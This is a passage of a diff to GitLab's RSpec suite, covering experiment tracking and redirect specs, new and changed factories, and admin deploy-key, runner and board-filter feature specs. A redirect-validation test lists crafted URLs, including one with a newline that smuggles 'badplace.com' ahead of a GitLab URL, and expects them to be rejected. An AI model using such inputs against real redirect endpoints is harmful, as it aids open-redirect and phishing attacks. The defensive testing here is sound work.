merged contexts" do - subject.track(:action, property: '_property_', context: [fake_context]) + application_experiment.track(:action, property: '_property_', context: [fake_context]) expect_snowplow_event( category: 'namespaced/stub', @@ -229,11 +233,80 @@ RSpec.describe ApplicationExperiment, :experiment do ] ) end + + context "when using known context resources" do + let(:user) { build(:user, id: non_existing_record_id) } + let(:project) { build(:project, id: non_existing_record_id) } + let(:namespace) { build(:namespace, id: non_existing_record_id) } + let(:group) { build(:group, id: non_existing_record_id) } + let(:actor) { user } + + let(:context) { { user: user, project: project, namespace: namespace } } + + it "includes those using the gitlab standard context" do + subject.track(:action) + + expect_snowplow_event( + category: 'namespaced/stub', + action: 'action', + user: user, + project: project, + namespace: namespace, + context: an_instance_of(Array) + ) + end + + it "falls back to using the group key" do + subject.context(namespace: nil, group: group) + + subject.track(:action) + + expect_snowplow_event( + category: 'namespaced/stub', + action: 'action', + user: user, + project: project, + namespace: group, + context: an_instance_of(Array) + ) + end + + context "with the actor key" do + it "provides it to the tracking call as the user" do + subject.context(user: nil, actor: actor) + + subject.track(:action) + + expect_snowplow_event( + category: 'namespaced/stub', + action: 'action', + user: actor, + project: project, + namespace: namespace, + context: an_instance_of(Array) + ) + end + + it "handles when it's not a user record" do + subject.context(user: nil, actor: nil) + + subject.track(:action) + + expect_snowplow_event( + category: 'namespaced/stub', + action: 'action', + project: project, + namespace: namespace, + context: an_instance_of(Array) + ) + end + end + end end describe "#key_for" do it "generates MD5 hashes" do - 
expect(subject.key_for(foo: :bar)).to eq('6f9ac12afdb9b58c2f19a136d09f9153') + expect(application_experiment.key_for(foo: :bar)).to eq('6f9ac12afdb9b58c2f19a136d09f9153') end end @@ -251,31 +324,33 @@ RSpec.describe ApplicationExperiment, :experiment do "https://badplace.com\nhttps://gitlab.com" | nil 'https://gitlabbcom' | nil 'https://gitlabbcom/' | nil + 'http://gdk.test/foo/bar' | 'http://gdk.test/foo/bar' + 'http://localhost:3000/foo/bar' | 'http://localhost:3000/foo/bar' end with_them do it "returns the url or nil if invalid" do allow(Gitlab).to receive(:dev_env_or_com?).and_return(true) - expect(subject.process_redirect_url(url)).to eq(processed_url) + expect(application_experiment.process_redirect_url(url)).to eq(processed_url) end it "considers all urls invalid when not on dev or com" do allow(Gitlab).to receive(:dev_env_or_com?).and_return(false) - expect(subject.process_redirect_url(url)).to be_nil + expect(application_experiment.process_redirect_url(url)).to be_nil end end it "generates the correct urls based on where the engine was mounted" do - url = Rails.application.routes.url_helpers.experiment_redirect_url(subject, url: 'https://docs.gitlab.com') - expect(url).to include("/-/experiment/namespaced%2Fstub:#{subject.context.key}?https://docs.gitlab.com") + url = Rails.application.routes.url_helpers.experiment_redirect_url(application_experiment, url: 'https://docs.gitlab.com') + expect(url).to include("/-/experiment/namespaced%2Fstub:#{application_experiment.context.key}?https://docs.gitlab.com") end end context "when resolving variants" do it "uses the default value as specified in the yaml" do - expect(Feature).to receive(:enabled?).with('namespaced_stub', subject, type: :experiment, default_enabled: :yaml) + expect(Feature).to receive(:enabled?).with('namespaced_stub', application_experiment, type: :experiment, default_enabled: :yaml) - expect(subject.variant.name).to eq('control') + expect(application_experiment.variant.name).to eq('control') end 
context "when rolled out to 100%" do @@ -284,32 +359,52 @@ RSpec.describe ApplicationExperiment, :experiment do end it "returns the first variant name" do - subject.try(:variant1) {} - subject.try(:variant2) {} + application_experiment.try(:variant1) {} + application_experiment.try(:variant2) {} - expect(subject.variant.name).to eq('variant1') + expect(application_experiment.variant.name).to eq('variant1') end end end + context "when nesting experiments" do + before do + stub_experiments(top: :control, nested: :control) + end + + it "doesn't raise an exception" do + expect { experiment(:top) { |e| e.control { experiment(:nested) { } } } }.not_to raise_error + end + + it "tracks an event", :snowplow do + experiment(:top) { |e| e.control { experiment(:nested) { } } } + + expect(Gitlab::Tracking).to have_received(:event).with( # rubocop:disable RSpec/ExpectGitlabTracking + 'top', + 'nested', + hash_including(label: 'nested') + ) + end + end + context "when caching" do let(:cache) { Gitlab::Experiment::Configuration.cache } before do allow(Gitlab::Experiment::Configuration).to receive(:cache).and_call_original - cache.clear(key: subject.name) + cache.clear(key: application_experiment.name) - subject.use { } # setup the control - subject.try { } # setup the candidate + application_experiment.use { } # setup the control + application_experiment.try { } # setup the candidate end it "caches the variant determined by the variant resolver" do - expect(subject.variant.name).to eq('candidate') # we should be in the experiment + expect(application_experiment.variant.name).to eq('candidate') # we should be in the experiment - subject.run + application_experiment.run - expect(subject.cache.read).to eq('candidate') + expect(application_experiment.cache.read).to eq('candidate') end it "doesn't cache a variant if we don't explicitly provide one" do @@ -320,11 +415,11 @@ RSpec.describe ApplicationExperiment, :experiment do # the control. 
stub_feature_flags(namespaced_stub: false) # simulate being not rolled out - expect(subject.variant.name).to eq('control') # if we ask, it should be control + expect(application_experiment.variant.name).to eq('control') # if we ask, it should be control - subject.run + application_experiment.run - expect(subject.cache.read).to be_nil + expect(application_experiment.cache.read).to be_nil end it "caches a control variant if we assign it specifically" do @@ -332,27 +427,27 @@ RSpec.describe ApplicationExperiment, :experiment do # that this context will always get the control variant unless we delete # the field from the cache (or clear the entire experiment cache) -- or # write code that would specify a different variant. - subject.run(:control) + application_experiment.run(:control) - expect(subject.cache.read).to eq('control') + expect(application_experiment.cache.read).to eq('control') end context "arbitrary attributes" do before do - subject.cache.store.clear(key: subject.name + '_attrs') + application_experiment.cache.store.clear(key: application_experiment.name + '_attrs') end it "sets and gets attributes about an experiment" do - subject.cache.attr_set(:foo, :bar) + application_experiment.cache.attr_set(:foo, :bar) - expect(subject.cache.attr_get(:foo)).to eq('bar') + expect(application_experiment.cache.attr_get(:foo)).to eq('bar') end it "increments a value for an experiment" do - expect(subject.cache.attr_get(:foo)).to be_nil + expect(application_experiment.cache.attr_get(:foo)).to be_nil - expect(subject.cache.attr_inc(:foo)).to eq(1) - expect(subject.cache.attr_inc(:foo)).to eq(2) + expect(application_experiment.cache.attr_inc(:foo)).to eq(1) + expect(application_experiment.cache.attr_inc(:foo)).to eq(2) end end end diff --git a/spec/experiments/new_project_sast_enabled_experiment_spec.rb b/spec/experiments/new_project_sast_enabled_experiment_spec.rb index dcf71bfffd7..38f58c01973 100644 --- a/spec/experiments/new_project_sast_enabled_experiment_spec.rb +++ 
b/spec/experiments/new_project_sast_enabled_experiment_spec.rb @@ -4,7 +4,7 @@ require 'spec_helper' RSpec.describe NewProjectSastEnabledExperiment do it "defines the expected behaviors and variants" do - expect(subject.behaviors.keys).to match_array(%w[control candidate free_indicator]) + expect(subject.behaviors.keys).to match_array(%w[control candidate free_indicator unchecked_candidate]) end it "publishes to the database" do diff --git a/spec/factories/ci/pipelines.rb b/spec/factories/ci/pipelines.rb index 1d25964a4be..b2c1eff6fbd 100644 --- a/spec/factories/ci/pipelines.rb +++ b/spec/factories/ci/pipelines.rb @@ -18,15 +18,13 @@ FactoryBot.define do transient { child_of { nil } } transient { upstream_of { nil } } - before(:create) do |pipeline, evaluator| - pipeline.ensure_project_iid! - end - after(:build) do |pipeline, evaluator| if evaluator.child_of pipeline.project = evaluator.child_of.project pipeline.source = :parent_pipeline end + + pipeline.ensure_project_iid! end after(:create) do |pipeline, evaluator| diff --git a/spec/factories/clusters/agents/activity_events.rb b/spec/factories/clusters/agents/activity_events.rb new file mode 100644 index 00000000000..ff73f617964 --- /dev/null +++ b/spec/factories/clusters/agents/activity_events.rb @@ -0,0 +1,13 @@ +# frozen_string_literal: true + +FactoryBot.define do + factory :agent_activity_event, class: 'Clusters::Agents::ActivityEvent' do + association :agent, factory: :cluster_agent + association :agent_token, factory: :cluster_agent_token + user + + kind { :token_created } + level { :info } + recorded_at { Time.current } + end +end diff --git a/spec/factories/gpg_signature.rb b/spec/factories/commit_signature/gpg_signature.rb index 2ab4d190276..50a25291cc7 100644 --- a/spec/factories/gpg_signature.rb +++ b/spec/factories/commit_signature/gpg_signature.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true FactoryBot.define do - factory :gpg_signature do + factory :gpg_signature, class: 
'CommitSignatures::GpgSignature' do commit_sha { Digest::SHA1.hexdigest(SecureRandom.hex) } project gpg_key diff --git a/spec/factories/x509_commit_signature.rb b/spec/factories/commit_signature/x509_commit_signature.rb index a342b240690..1de92f56b33 100644 --- a/spec/factories/x509_commit_signature.rb +++ b/spec/factories/commit_signature/x509_commit_signature.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true FactoryBot.define do - factory :x509_commit_signature do + factory :x509_commit_signature, class: 'CommitSignatures::X509CommitSignature' do commit_sha { Digest::SHA1.hexdigest(SecureRandom.hex) } project x509_certificate diff --git a/spec/factories/customer_relations/contacts.rb b/spec/factories/customer_relations/contacts.rb index 437f8feea48..821c45d7514 100644 --- a/spec/factories/customer_relations/contacts.rb +++ b/spec/factories/customer_relations/contacts.rb @@ -6,6 +6,7 @@ FactoryBot.define do first_name { generate(:name) } last_name { generate(:name) } + email { generate(:email) } trait :with_organization do organization diff --git a/spec/factories/deployments.rb b/spec/factories/deployments.rb index 2aab9764560..ab1b794632a 100644 --- a/spec/factories/deployments.rb +++ b/spec/factories/deployments.rb @@ -55,6 +55,10 @@ FactoryBot.define do status { :created } end + trait :blocked do + status { :blocked } + end + # This trait hooks the state maechine's events trait :succeed do after(:create) do |deployment, evaluator| diff --git a/spec/factories/gitlab/database/background_migration/batched_migrations.rb b/spec/factories/gitlab/database/background_migration/batched_migrations.rb index de57e0c1565..79b4447b76e 100644 --- a/spec/factories/gitlab/database/background_migration/batched_migrations.rb +++ b/spec/factories/gitlab/database/background_migration/batched_migrations.rb @@ -12,5 +12,13 @@ FactoryBot.define do sequence(:job_arguments) { |n| [["column_#{n}"], ["column_#{n}_convert_to_bigint"]] } total_tuple_count { 10_000 } pause_ms { 100 } + + 
trait :finished do + status { :finished } + end + + trait :failed do + status { :failed } + end end end diff --git a/spec/factories/import_failures.rb b/spec/factories/import_failures.rb index 376b2ff39e2..df0793664f4 100644 --- a/spec/factories/import_failures.rb +++ b/spec/factories/import_failures.rb @@ -10,6 +10,8 @@ FactoryBot.define do exception_class { 'RuntimeError' } exception_message { 'Something went wrong' } source { 'method_call' } + relation_key { 'issues' } + relation_index { 1 } correlation_id_value { SecureRandom.uuid } trait :hard_failure do diff --git a/spec/factories/issue_emails.rb b/spec/factories/issue_emails.rb new file mode 100644 index 00000000000..edf07aab0cd --- /dev/null +++ b/spec/factories/issue_emails.rb @@ -0,0 +1,8 @@ +# frozen_string_literal: true + +FactoryBot.define do + factory :issue_email, class: 'Issue::Email' do + issue + email_message_id { generate(:short_text) } + end +end diff --git a/spec/factories/namespaces.rb b/spec/factories/namespaces.rb index 959183f227d..2b3dabc07d8 100644 --- a/spec/factories/namespaces.rb +++ b/spec/factories/namespaces.rb @@ -1,12 +1,14 @@ # frozen_string_literal: true FactoryBot.define do - factory :namespace do + # This factory is called :namespace but actually maps (and always has) to User type + # See https://gitlab.com/gitlab-org/gitlab/-/merge_requests/74152#note_730034103 for context + factory :namespace, class: 'Namespaces::UserNamespace' do sequence(:name) { |n| "namespace#{n}" } + type { Namespaces::UserNamespace.sti_name } + path { name.downcase.gsub(/\s/, '_') } - # TODO: can this be moved into the :user_namespace factory? 
- # evaluate in issue https://gitlab.com/gitlab-org/gitlab/-/issues/341070 owner { association(:user, strategy: :build, namespace: instance, username: path) } trait :with_aggregation_schedule do diff --git a/spec/factories/notes.rb b/spec/factories/notes.rb index c15ec91d2ce..2159f5b2dc1 100644 --- a/spec/factories/notes.rb +++ b/spec/factories/notes.rb @@ -8,6 +8,7 @@ FactoryBot.define do note { generate(:title) } author { project&.creator || association(:user) } on_issue + updated_by { author } factory :note_on_commit, traits: [:on_commit] factory :note_on_issue, traits: [:on_issue], aliases: [:votable_note] diff --git a/spec/factories/packages/debian/component_file.rb b/spec/factories/packages/debian/component_file.rb index 9aee91b0973..eeba64ba5d2 100644 --- a/spec/factories/packages/debian/component_file.rb +++ b/spec/factories/packages/debian/component_file.rb @@ -27,8 +27,8 @@ FactoryBot.define do file_type { :packages } end - trait(:source) do - file_type { :source } + trait(:sources) do + file_type { :sources } architecture { nil } end diff --git a/spec/factories/packages/package_files.rb b/spec/factories/packages/package_files.rb index d9afbac1048..845fd882beb 100644 --- a/spec/factories/packages/package_files.rb +++ b/spec/factories/packages/package_files.rb @@ -323,6 +323,14 @@ FactoryBot.define do size { 1149.bytes } end + trait(:generic_zip) do + package + file_fixture { 'spec/fixtures/packages/generic/myfile.zip' } + file_name { "#{package.name}.zip" } + file_sha256 { '3559e770bd493b326e8ec5e6242f7206d3fbf94fa47c16f82d34a037daa113e5' } + size { 3989.bytes } + end + trait(:object_storage) do file_store { Packages::PackageFileUploader::Store::REMOTE } end diff --git a/spec/factories/packages/packages.rb b/spec/factories/packages/packages.rb index bb9aa95fe08..153518f4cd3 100644 --- a/spec/factories/packages/packages.rb +++ b/spec/factories/packages/packages.rb @@ -247,6 +247,12 @@ FactoryBot.define do sequence(:name) { |n| "generic-package-#{n}" } 
version { '1.0.0' } package_type { :generic } + + trait(:with_zip_file) do + after :create do |package| + create :package_file, :generic_zip, package: package + end + end end end end diff --git a/spec/factories/plan_limits.rb b/spec/factories/plan_limits.rb index b5921c1b311..ad10629af05 100644 --- a/spec/factories/plan_limits.rb +++ b/spec/factories/plan_limits.rb @@ -12,6 +12,7 @@ FactoryBot.define do trait :with_package_file_sizes do conan_max_file_size { 100 } + helm_max_file_size { 100 } maven_max_file_size { 100 } npm_max_file_size { 100 } nuget_max_file_size { 100 } diff --git a/spec/factories/projects.rb b/spec/factories/projects.rb index fb86f4672bc..981f10e8260 100644 --- a/spec/factories/projects.rb +++ b/spec/factories/projects.rb @@ -190,7 +190,7 @@ FactoryBot.define do end after :create do |project, evaluator| - raise "Failed to create repository!" unless project.create_repository + raise "Failed to create repository!" unless project.repository.exists? || project.create_repository evaluator.files.each do |filename, content| project.repository.create_file( diff --git a/spec/factories/protected_branches.rb b/spec/factories/protected_branches.rb index 2d3abc77350..bac1cf21596 100644 --- a/spec/factories/protected_branches.rb +++ b/spec/factories/protected_branches.rb @@ -2,7 +2,7 @@ FactoryBot.define do factory :protected_branch do - name + sequence(:name) { |n| "protected_branch_#{n}" } project transient do @@ -11,6 +11,20 @@ FactoryBot.define do default_access_level { true } end + trait :create_branch_on_repository do + association :project, factory: [:project, :repository] + + transient do + repository_branch_name { name } + end + + after(:create) do |protected_branch, evaluator| + project = protected_branch.project + + project.repository.create_branch(evaluator.repository_branch_name, project.default_branch_or_main) + end + end + trait :developers_can_push do transient do default_push_level { false } diff --git a/spec/factories/sequences.rb 
b/spec/factories/sequences.rb index 0edc2b6027d..893865962d8 100644 --- a/spec/factories/sequences.rb +++ b/spec/factories/sequences.rb @@ -2,7 +2,7 @@ FactoryBot.define do sequence(:username) { |n| "user#{n}" } - sequence(:name) { |n| "John Doe#{n}" } + sequence(:name) { |n| "Sidney Jones#{n}" } sequence(:email) { |n| "user#{n}@example.org" } sequence(:email_alias) { |n| "user.alias#{n}@example.org" } sequence(:title) { |n| "My title #{n}" } @@ -21,4 +21,5 @@ FactoryBot.define do sequence(:jira_branch) { |n| "feature/PROJ-#{n}" } sequence(:job_name) { |n| "job #{n}" } sequence(:work_item_type_name) { |n| "bug#{n}" } + sequence(:short_text) { |n| "someText#{n}" } end diff --git a/spec/factories/user_callouts.rb b/spec/factories/users/callouts.rb index cedc6efd8d7..d9f142fee6f 100644 --- a/spec/factories/user_callouts.rb +++ b/spec/factories/users/callouts.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true FactoryBot.define do - factory :user_callout do + factory :callout, class: 'Users::Callout' do feature_name { :gke_cluster_integration } user diff --git a/spec/features/action_cable_logging_spec.rb b/spec/features/action_cable_logging_spec.rb index 2e6ce93f7f7..cf20b204cc5 100644 --- a/spec/features/action_cable_logging_spec.rb +++ b/spec/features/action_cable_logging_spec.rb @@ -25,7 +25,7 @@ RSpec.describe 'ActionCable logging', :js do username: user.username ) - expect(ActiveSupport::Notifications).to receive(:instrument).with('subscribe.action_cable', subscription_data) + expect(ActiveSupport::Notifications).to receive(:instrument).with('subscribe.action_cable', subscription_data).at_least(:once) gitlab_sign_in(user) visit project_issue_path(project, issue) diff --git a/spec/features/admin/admin_deploy_keys_spec.rb b/spec/features/admin/admin_deploy_keys_spec.rb index 53caf0fac33..9b74aa2ac5a 100644 --- a/spec/features/admin/admin_deploy_keys_spec.rb +++ b/spec/features/admin/admin_deploy_keys_spec.rb @@ -3,101 +3,125 @@ require 'spec_helper' RSpec.describe 
'admin deploy keys' do + include Spec::Support::Helpers::ModalHelpers + let_it_be(:admin) { create(:admin) } let!(:deploy_key) { create(:deploy_key, public: true) } let!(:another_deploy_key) { create(:another_deploy_key, public: true) } before do - stub_feature_flags(admin_deploy_keys_vue: false) sign_in(admin) gitlab_enable_admin_mode_sign_in(admin) end - it 'show all public deploy keys' do - visit admin_deploy_keys_path + shared_examples 'renders deploy keys correctly' do + it 'show all public deploy keys' do + visit admin_deploy_keys_path - page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do - expect(page).to have_content(deploy_key.title) - expect(page).to have_content(another_deploy_key.title) + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).to have_content(deploy_key.title) + expect(page).to have_content(another_deploy_key.title) + end end - end - it 'shows all the projects the deploy key has write access' do - write_key = create(:deploy_keys_project, :write_access, deploy_key: deploy_key) + it 'shows all the projects the deploy key has write access' do + write_key = create(:deploy_keys_project, :write_access, deploy_key: deploy_key) - visit admin_deploy_keys_path + visit admin_deploy_keys_path - page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do - expect(page).to have_content(write_key.project.full_name) + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).to have_content(write_key.project.full_name) + end end - end - describe 'create a new deploy key' do - let(:new_ssh_key) { attributes_for(:key)[:key] } + describe 'create a new deploy key' do + let(:new_ssh_key) { attributes_for(:key)[:key] } - before do - visit admin_deploy_keys_path - click_link 'New deploy key' - end + before do + visit admin_deploy_keys_path + click_link 'New deploy key' + end - it 'creates a new deploy key' do - fill_in 'deploy_key_title', with: 'laptop' - fill_in 
'deploy_key_key', with: new_ssh_key - click_button 'Create' + it 'creates a new deploy key' do + fill_in 'deploy_key_title', with: 'laptop' + fill_in 'deploy_key_key', with: new_ssh_key + click_button 'Create' - expect(current_path).to eq admin_deploy_keys_path + expect(current_path).to eq admin_deploy_keys_path - page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do - expect(page).to have_content('laptop') + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).to have_content('laptop') + end end end - end - describe 'update an existing deploy key' do - before do - visit admin_deploy_keys_path - find('tr', text: deploy_key.title).click_link('Edit') - end + describe 'update an existing deploy key' do + before do + visit admin_deploy_keys_path + page.within('tr', text: deploy_key.title) do + click_link(_('Edit deploy key')) + end + end - it 'updates an existing deploy key' do - fill_in 'deploy_key_title', with: 'new-title' - click_button 'Save changes' + it 'updates an existing deploy key' do + fill_in 'deploy_key_title', with: 'new-title' + click_button 'Save changes' - expect(current_path).to eq admin_deploy_keys_path + expect(current_path).to eq admin_deploy_keys_path - page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do - expect(page).to have_content('new-title') + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).to have_content('new-title') + end end end end - describe 'remove an existing deploy key' do - before do - visit admin_deploy_keys_path - end + context 'when `admin_deploy_keys_vue` feature flag is enabled', :js do + it_behaves_like 'renders deploy keys correctly' - it 'removes an existing deploy key' do - find('tr', text: deploy_key.title).click_link('Remove') + describe 'remove an existing deploy key' do + before do + visit admin_deploy_keys_path + end - expect(current_path).to eq admin_deploy_keys_path - 
page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do - expect(page).not_to have_content(deploy_key.title) + it 'removes an existing deploy key' do + accept_gl_confirm('Are you sure you want to delete this deploy key?', button_text: 'Delete') do + page.within('tr', text: deploy_key.title) do + click_button _('Delete deploy key') + end + end + + expect(current_path).to eq admin_deploy_keys_path + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).not_to have_content(deploy_key.title) + end end end end - context 'when `admin_deploy_keys_vue` feature flag is enabled', :js do + context 'when `admin_deploy_keys_vue` feature flag is disabled' do before do - stub_feature_flags(admin_deploy_keys_vue: true) - - visit admin_deploy_keys_path + stub_feature_flags(admin_deploy_keys_vue: false) end - it 'renders the Vue app', :aggregate_failures do - expect(page).to have_content('Public deploy keys') - expect(page).to have_selector('[data-testid="deploy-keys-list"]') - expect(page).to have_link('New deploy key', href: new_admin_deploy_key_path) + it_behaves_like 'renders deploy keys correctly' + + describe 'remove an existing deploy key' do + before do + visit admin_deploy_keys_path + end + + it 'removes an existing deploy key' do + page.within('tr', text: deploy_key.title) do + click_link _('Remove deploy key') + end + + expect(current_path).to eq admin_deploy_keys_path + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).not_to have_content(deploy_key.title) + end + end end end end diff --git a/spec/features/admin/admin_labels_spec.rb b/spec/features/admin/admin_labels_spec.rb index 65de1160cfd..86d60b5d483 100644 --- a/spec/features/admin/admin_labels_spec.rb +++ b/spec/features/admin/admin_labels_spec.rb @@ -45,7 +45,7 @@ RSpec.describe 'admin issues labels' do wait_for_requests - expect(page).to have_content("There are no labels yet") + expect(page).to have_content("Define your default 
set of project labels") expect(page).not_to have_content('bug') expect(page).not_to have_content('feature_label') end diff --git a/spec/features/admin/admin_projects_spec.rb b/spec/features/admin/admin_projects_spec.rb index a50ef34d327..8938bab60d7 100644 --- a/spec/features/admin/admin_projects_spec.rb +++ b/spec/features/admin/admin_projects_spec.rb @@ -6,6 +6,7 @@ RSpec.describe "Admin::Projects" do include Spec::Support::Helpers::Features::MembersHelpers include Spec::Support::Helpers::Features::InviteMembersModalHelper include Select2Helper + include Spec::Support::Helpers::ModalHelpers let(:user) { create :user } let(:project) { create(:project) } @@ -39,7 +40,7 @@ RSpec.describe "Admin::Projects" do expect(page).to have_content(project.name) expect(page).to have_content(archived_project.name) - expect(page).to have_xpath("//span[@class='badge badge-warning']", text: 'archived') + expect(page).to have_xpath("//span[@class='gl-badge badge badge-pill badge-warning md']", text: 'archived') end it 'renders only archived projects', :js do @@ -145,7 +146,7 @@ RSpec.describe "Admin::Projects" do click_button 'Leave' end - page.within('[role="dialog"]') do + within_modal do click_button('Leave') end diff --git a/spec/features/admin/admin_runners_spec.rb b/spec/features/admin/admin_runners_spec.rb index 7e2751daefa..cc2d36221dc 100644 --- a/spec/features/admin/admin_runners_spec.rb +++ b/spec/features/admin/admin_runners_spec.rb @@ -4,6 +4,7 @@ require 'spec_helper' RSpec.describe "Admin Runners" do include StubENV + include Spec::Support::Helpers::ModalHelpers before do stub_env('IN_MEMORY_APPLICATION_SETTINGS', 'false') @@ -25,7 +26,7 @@ RSpec.describe "Admin Runners" do visit admin_runners_path expect(page).to have_text "Register an instance runner" - expect(page).to have_text "Runners currently online: 1" + expect(page).to have_text "Online Runners 1" end it 'with an instance runner shows an instance badge' do @@ -58,6 +59,55 @@ RSpec.describe "Admin Runners" do 
end end + it 'shows a job count' do + runner = create(:ci_runner, :project, projects: [project]) + + create(:ci_build, runner: runner) + create(:ci_build, runner: runner) + + visit admin_runners_path + + within "[data-testid='runner-row-#{runner.id}'] [data-label='Jobs']" do + expect(page).to have_content '2' + end + end + + describe 'delete runner' do + let!(:runner) { create(:ci_runner, description: 'runner-foo') } + + before do + visit admin_runners_path + + within "[data-testid='runner-row-#{runner.id}']" do + click_on 'Delete runner' + end + end + + it 'shows a confirmation modal' do + expect(page).to have_text "Delete runner ##{runner.id} (#{runner.short_sha})?" + expect(page).to have_text "Are you sure you want to continue?" + end + + it 'deletes a runner' do + within '.modal' do + click_on 'Delete runner' + end + + expect(page.find('.gl-toast')).to have_text(/Runner .+ deleted/) + expect(page).not_to have_content 'runner-foo' + end + + it 'cancels runner deletion' do + within '.modal' do + click_on 'Cancel' + end + + wait_for_requests + + expect(page).to have_content 'runner-foo' + end + end + describe 'search' do before do create(:ci_runner, :instance, description: 'runner-foo') @@ -323,7 +373,7 @@ RSpec.describe "Admin Runners" do it 'has all necessary texts including no runner message' do expect(page).to have_text "Register an instance runner" - expect(page).to have_text "Runners currently online: 0" + expect(page).to have_text "Online Runners 0" expect(page).to have_text 'No runners found' end end @@ -353,7 +403,7 @@ RSpec.describe "Admin Runners" do end it 'dismisses runner installation modal' do - page.within('[role="dialog"]') do + within_modal do click_button('Close', match: :first) end diff --git a/spec/features/admin/admin_settings_spec.rb b/spec/features/admin/admin_settings_spec.rb index 0a39baca259..29323c604ef 100644 --- a/spec/features/admin/admin_settings_spec.rb +++ b/spec/features/admin/admin_settings_spec.rb @@ -445,6 +445,24 @@ 
RSpec.describe 'Admin updates settings' do expect(current_settings.repository_storages_weighted).to eq('default' => 50) end + + context 'External storage for repository static objects' do + it 'changes Repository external storage settings' do + encrypted_token = Gitlab::CryptoHelper.aes256_gcm_encrypt('OldToken') + current_settings.update_attribute :static_objects_external_storage_auth_token_encrypted, encrypted_token + + visit repository_admin_application_settings_path + + page.within('.as-repository-static-objects') do + fill_in 'application_setting_static_objects_external_storage_url', with: 'http://example.com' + fill_in 'application_setting_static_objects_external_storage_auth_token', with: 'Token' + click_button 'Save changes' + end + + expect(current_settings.static_objects_external_storage_url).to eq('http://example.com') + expect(current_settings.static_objects_external_storage_auth_token).to eq('Token') + end + end end context 'Reporting page' do diff --git a/spec/features/admin/users/user_spec.rb b/spec/features/admin/users/user_spec.rb index 73477fb93dd..ae940fecabe 100644 --- a/spec/features/admin/users/user_spec.rb +++ b/spec/features/admin/users/user_spec.rb @@ -4,6 +4,7 @@ require 'spec_helper' RSpec.describe 'Admin::Users::User' do include Spec::Support::Helpers::Features::AdminUsersHelpers + include Spec::Support::Helpers::ModalHelpers let_it_be(:user) { create(:omniauth_user, provider: 'twitter', extern_uid: '123456') } let_it_be(:current_user) { create(:admin) } @@ -113,7 +114,7 @@ RSpec.describe 'Admin::Users::User' do click_action_in_user_dropdown(user_sole_owner_of_group.id, 'Delete user and contributions') - page.within('[role="dialog"]') do + within_modal do fill_in('username', with: user_sole_owner_of_group.name) click_button('Delete user and contributions') end @@ -426,7 +427,7 @@ RSpec.describe 'Admin::Users::User' do click_button 'Confirm user' - page.within('[role="dialog"]') do + within_modal do expect(page).to have_content("Confirm 
user #{unconfirmed_user.name}?") expect(page).to have_content('This user has an unconfirmed email address. You may force a confirmation.') diff --git a/spec/features/alert_management/alert_details_spec.rb b/spec/features/alert_management/alert_details_spec.rb index ce82b5adf8d..579b8221041 100644 --- a/spec/features/alert_management/alert_details_spec.rb +++ b/spec/features/alert_management/alert_details_spec.rb @@ -60,7 +60,7 @@ RSpec.describe 'Alert details', :js do expect(alert_status).to have_content('Triggered') - find('.btn-link').click + find('.gl-button').click find('.gl-new-dropdown-item', text: 'Acknowledged').click wait_for_requests @@ -79,7 +79,7 @@ RSpec.describe 'Alert details', :js do wait_for_requests - expect(alert_assignee).to have_content('Assignee Edit John Doe') + expect(alert_assignee).to have_content('Assignee Edit Sidney Jones') end end end diff --git a/spec/features/boards/board_filters_spec.rb b/spec/features/boards/board_filters_spec.rb new file mode 100644 index 00000000000..25e474bb676 --- /dev/null +++ b/spec/features/boards/board_filters_spec.rb @@ -0,0 +1,197 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'Issue board filters', :js do + let_it_be(:project) { create(:project, :repository) } + let_it_be(:user) { create(:user) } + let_it_be(:board) { create(:board, project: project) } + let_it_be(:project_label) { create(:label, project: project, title: 'Label') } + let_it_be(:milestone_1) { create(:milestone, project: project) } + let_it_be(:milestone_2) { create(:milestone, project: project) } + let_it_be(:release) { create(:release, tag: 'v1.0', project: project, milestones: [milestone_1]) } + let_it_be(:release_2) { create(:release, tag: 'v2.0', project: project, milestones: [milestone_2]) } + let_it_be(:issue_1) { create(:issue, project: project, milestone: milestone_1, author: user) } + let_it_be(:issue_2) { create(:labeled_issue, project: project, milestone: milestone_2, assignees: [user], labels: 
[project_label], confidential: true) } + let_it_be(:award_emoji1) { create(:award_emoji, name: 'thumbsup', user: user, awardable: issue_1) } + + let(:filtered_search) { find('[data-testid="issue_1-board-filtered-search"]') } + let(:filter_input) { find('.gl-filtered-search-term-input')} + let(:filter_dropdown) { find('.gl-filtered-search-suggestion-list') } + let(:filter_first_suggestion) { find('.gl-filtered-search-suggestion-list').first('.gl-filtered-search-suggestion') } + let(:filter_submit) { find('.gl-search-box-by-click-search-button') } + + before do + stub_feature_flags(issue_boards_filtered_search: true) + + project.add_maintainer(user) + sign_in(user) + + visit_project_board + end + + shared_examples 'loads all the users when opened' do + it 'and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 3) + + click_on user.username + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + expect(find('.board-card')).to have_content(issue.title) + end + end + + describe 'filters by assignee' do + before do + set_filter('assignee') + end + + it_behaves_like 'loads all the users when opened' do + let(:issue) { issue_2 } + end + end + + describe 'filters by author' do + before do + set_filter('author') + end + + it_behaves_like 'loads all the users when opened' do + let(:issue) { issue_1 } + end + end + + describe 'filters by label' do + before do + set_filter('label') + end + + it 'loads all the labels when opened and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 3) + + filter_dropdown.click_on project_label.title + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + 
